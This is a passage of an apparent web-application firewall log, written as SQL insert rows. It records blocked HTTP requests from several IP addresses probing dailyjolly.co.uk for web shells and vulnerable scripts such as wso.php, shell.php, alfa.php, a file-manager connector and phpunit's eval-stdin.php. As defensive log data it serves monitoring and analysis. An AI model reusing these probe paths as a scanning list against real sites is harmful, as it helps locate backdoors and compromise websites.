SV1)\"}','u8nLripTZoyKtBYUd3fF0avH',0,1673994560.3093,225,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','nPpBwGciTkCrQZo1Mq7HA5UJ',0,1673997074.2187,195,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','aPhxgLIiZ51Fq6YmCbfNsVuH',0,1673997077.8049,173,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','YTpHiUNe2IVgPxmdAMk4SJLO',0,1673997081.3525,190,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','szJUb1LB5GdYcKoNpjiV6f3h',0,1673997084.7757,187,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','jMZcDVetwSh95RuOB0KrbLTl',0,1673997086.8970,173,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','vkn7iSefJNlKsyr8HoI0Ox2w',0,1673997089.9997,239,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','YGUCbSO432TfgIaoErxBLeNy',0,1673997096.0157,326,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','NkIbVARDgsX1MxELm6B78cul',0,1673997099.8949,175,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','y6hZOkTzWHCXlvsxDBwuoqm8',0,1673997101.3215,172,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','AtS8aXRdp9CjEzJy2uDLTObg',0,1673997106.8277,247,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','MnzXvRpKdY6orguA2wfP7baC',0,1673997108.8172,213,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','3FrAWNhcV1tnlGgwsHjMUyCd',0,1673997114.9895,205,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','bGojHQdsZu9P6gIy7a4hOqDF',0,1673997118.1051,191,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','0tbXxdkligDUYQj5svoSGqH4',0,1673997120.5550,172,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','lyvgsaD1rUGYjCF5H8VXpWbO',0,1673997123.3001,158,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','h8SGL7T4FbyaBVsEZO1IQzCi',0,1673997125.8640,182,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','zoqBM7paQu8Pb0YWfnLCjOUt',0,1673997127.7140,183,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','WrJjPSqzoZIpAnEuaTyfsGFL',0,1673997130.7172,169,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','edvEtg4RUl0u8KcpWQiaF2Bq',0,1673997132.2885,160,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','PeFikg5qOEoVMA4rK27c0hZY',0,1673997135.1060,177,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','LRgXUMV5t3vQeHSsrWAbdy6l',0,1673997137.3008,183,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.27.1\"}','MLOUp6yJsgDm0PZt5e4njdo1',0,1673997140.0724,164,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','fEzwSKykpd5hiojtCAJWBxUD',0,1673997142.2014,170,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','ISATs2MFc7rBRZ6WN9btuaYH',0,1673997145.7443,225,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.27.1\"}','aQ5xlbGjhDtZ1UMKIgdNTs8Y',0,1673997148.5099,180,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.27.1\"}','BW7tT2fvLQ6pOyqgZbkUC1Go',0,1673997150.6304,167,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','2WX1jfgPUDFsInzrio7LOa6m',0,1673997153.7476,182,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','3PTc6s8dRA2r5Bf4MO1WzIxX',0,1673997155.6069,188,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.27.1\"}','DCK1I925OyjL6nmVlB0xbGJ7',0,1673997158.7696,169,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','FG67YZoAbseEm8q4vWkz3xnN',0,1673997161.7843,163,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','TlAa1cQSuymHMLnZNGwpOVqJ',0,1673997164.8272,161,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.27.1\"}','sFvAdcjihO69yHaNR3tMnlDK',0,1673997167.4015,220,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/Marvins.php','','{\"1\":\"python-requests\\/2.27.1\"}','u0zKRLU6Y1iInvp5NkHrOfqG',0,1673997169.2736,183,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.27.1\"}','wOjRBFP5a7DVb34ErZvTenUH',0,1673997171.7828,208,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','0H8NKEjGwoBFMrTDv3QbfkpU',0,1673997173.7424,220,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','pADcCYRjrEa37svSMt5Ud1fl',0,1673997176.6521,185,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','IX76YVUQdHTZfn82Fw3GoNvs',0,1673997179.6655,205,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/RxR.php','','{\"1\":\"python-requests\\/2.27.1\"}','zbfyDjNmVQsT54RWug0MLlAk',0,1673997182.2501,201,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.27.1\"}','E2aT971jomqAUlpCDfMLhxQ0',0,1673997190.0591,187,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"python-requests\\/2.27.1\"}','5S971khUVxAIs3RM4DonjXdQ',0,1673997192.2224,182,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','YzSy4nWrx7meDTMZFqokBwH5',0,1673997194.6744,168,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','UF6GTIOAgNYotZhpxB5r34id',0,1673997201.7038,216,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','IUKuGFTJ0RQwyOmEqCeMx2zH',0,1673997204.6464,178,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','OKJVBNHXgYsAuGheDTbqt3xI',0,1673997207.0868,174,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','H4IC0Yf7XwDa63vFqGQhVMmL',0,1673997209.9793,202,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','CelU8tzrJ3fYgKM2PaSNIXyw',0,1673997212.0933,225,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','yT6C40FvGQcaDndRsSWgPlK9',0,1673997215.3461,172,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','i1SXEw3jYl72QcagyCOrnhG0',0,1673997218.1894,160,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','rfiVYxj1dSEm8oRwp4lyqGnL',0,1673997220.4346,172,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','yYH6txhRGrdQ1zJCwBKXk5ZU',0,1673997222.9496,180,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','NI6U1rXE72sVoq5CnWkJMlZe',0,1673997225.1017,190,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','I9MbK0YPwad7BJoQTWNDqAeR',0,1673997226.9277,224,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','sMKQWSCnZuPqYLeO9moBJpTc',0,1673997229.0182,193,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','vV5Joz87GwFkuTIyYUdAbhQB',0,1673997231.1685,178,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','wOQjbKqRY5AzJTpiaLurgdXs',0,1673997232.9761,155,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','9jVu3R6Hyl1wWioh2MBAYQxG',0,1673997235.4234,200,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','73IOq8mhQvgA6CPKB4EdsSbw',0,1673997238.6823,177,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','HQXJPEle3vDBk5FzxId0G8VR',0,1673997239.9912,164,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','fA5n04q1wpjhLH8iDve93MWy',0,1673997242.7510,243,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','ZcfFUM4LhtH925BgsRq81lJw',0,1673997244.9595,166,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','d6rNCFWzw7Ie4imZ9k5vRMf8',0,1673997247.5833,233,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','9RtJY0msQZOjexF24rpugWiA',0,1673997249.9780,179,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','l2VAjnmzYB6ZLqdE81Dh4O9a',0,1673997252.2332,163,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','98evq2g75m6DocLC4WxbMQkO',0,1673997254.8640,164,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.27.1\"}','RM9oQc6VdmbYg2kyt04Wqa3f',0,1673997256.7338,165,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','tCkDIZM70pl3BbWLvxEgsJPq',0,1673997259.4502,161,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','MydkNGHw79nxKYUPcjq6esQi',0,1673997261.7900,161,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','7ND0YMjKLHIeG5x8nBQT3c4f',0,1673997264.1884,180,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','zqLfeQY9SoGih6x8uMFXNtwR',0,1673997266.7682,168,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','ceUzph1WnJrXySVv0ouQFTbL',0,1673997290.8605,203,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','VOd564REUAQ8kHo0aZXMm3pi',0,1673997292.0167,162,'','GET',403,0,700,0,1,'',0),('217.160.238.12',3651202572,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','eSgrqiQlvWhVbBj4ow1XpG25',0,1673997293.7865,174,'','GET',403,0,700,0,1,'',0),('146.190.84.120',2461947000,'','https://www.dailyjolly.co.uk//wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko\\/20100101 Firefox\\/103.0\",\"2\":\"https:\\/\\/www.dailyjolly.co.uk\\/\"}','jK2yMOmBGz5W0TN8Vpvigod3',0,1673998830.4220,196,'','POST',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','JiN3D2gFLbrcRU4SmyHMYvuB',0,1674008966.7714,333,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','7Hs2dTRKFLao5W6v9CwAn0hz',0,1674009643.1414,386,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/xpwn.php','','{\"1\":\"python-requests\\/2.27.1\"}','xDNFdP5tym40X12LbORkKJwS',0,1674009666.5723,285,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','uXgxeZN9SzlUhm5WpHDyGrdR',0,1674014979.0806,296,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','CdzkFsAB4VHvXmy2x3SQK9t1',0,1674014981.8466,200,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ISgBQzlEFkZJxh96Rrp8Advo',0,1674014982.9044,190,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','93b78E5TDMLKIaZJSgjPfO4m',0,1674014986.6546,192,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','N91O4Y7VDEIKZBfvRGuLQM28',0,1674014987.0413,220,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','1DGWraHcvAVUMOhQfejLiR6n',0,1674014988.5157,183,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','xOU17IwYfcGhF4HtLqpzueWX',0,1674014989.3951,238,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','mzQHGvrFR4WcYBEA6IpSVew8',0,1674014989.8036,218,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','E0kXc4syVFWw1rbjUv7OChQg',0,1674014990.6520,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','e6AXjFwglSaEYyRQMWBcus38',0,1674014991.3175,164,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','nA17rtYhvcyBbquEeM6sJ35a',0,1674014996.6112,213,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','aHhkzCuDWrQ3F9qsUw62x4XL',0,1674015000.9294,159,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','cuUZL59kS8P0Qj6R1JvmMzWy',0,1674015013.0179,250,'','GET',403,0,700,0,1,'',0),('194.32.120.174',3256907950,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','DkUCpLwm97OMVzKsfayv5tJq',0,1674015312.3464,196,'','POST',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.dailyjolly.co.uk/wp-content/shell.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','ysD5Nl2kPFIXvxSn9zKjU7Va',0,1674015387.7416,246,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','04AqIprsilbxkQwVCdWcyJtE',0,1674016530.2935,249,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.26.0\"}','sVv7YtxBU9aTyWeE8lR5dZS3',0,1674016531.3424,174,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.26.0\"}','YPwc02zatUCRMB4u5KVojsmJ',0,1674016532.3030,186,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/C.php','','{\"1\":\"python-requests\\/2.26.0\"}','a9qznEVGNFJev1Hx60g3QXum',0,1674016533.3102,176,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.26.0\"}','mDr64Yg1xzcfvtsCwA0eQoRX',0,1674016534.3343,193,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/01.php','','{\"1\":\"python-requests\\/2.26.0\"}','8Oi7b4yp2XwakErU0qSnLlBG',0,1674016535.3687,200,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.26.0\"}','Tyius3FYOoaqLmQxeIVwMHWd',0,1674016536.4035,196,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/02.php','','{\"1\":\"python-requests\\/2.26.0\"}','e2AHoNlsLXfCDxqrhK4WjaRz',0,1674016537.5182,188,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"python-requests\\/2.26.0\"}','x3SWrcHG0TAVpb69KeuvQBaq',0,1674016539.2711,168,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','5lmQ6LDkPaZEROuhFtzqJn9x',0,1674016540.3472,176,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','nkB6S4HvKwsaDJQ5Zc8mLIpW',0,1674016541.3880,191,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','cqjTmbyJ2zA5LQ64h173tW98',0,1674016542.6847,209,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.26.0\"}','VxpIPezKnl70cwFLov6TdQfW',0,1674016543.7081,218,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.26.0\"}','DUsTfmohwgVNnK1XkHZIariW',0,1674016544.7056,182,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"python-requests\\/2.26.0\"}','OBuUs2iy1Da4e79YX3WlVKvm',0,1674016545.7535,182,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','TdbAmHFgSzq4VMB6c5spnaRP',0,1674016546.7446,166,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.26.0\"}','ZVesSKXoFhImv5DxiPcWMHlB',0,1674016547.7105,186,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"python-requests\\/2.26.0\"}','WGBeRqAQ4l9Z2N36O8hvM5mF',0,1674016548.6820,160,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.26.0\"}','SyAH2lPuZ1TqYjONpM9QVtxe',0,1674016549.7229,164,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"python-requests\\/2.26.0\"}','ozGZgqhO8CBi2j0THbJparDM',0,1674016550.7493,186,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.dailyjolly.co.uk/good.php','','{\"1\":\"python-requests\\/2.26.0\"}','kKGNS1PlqyH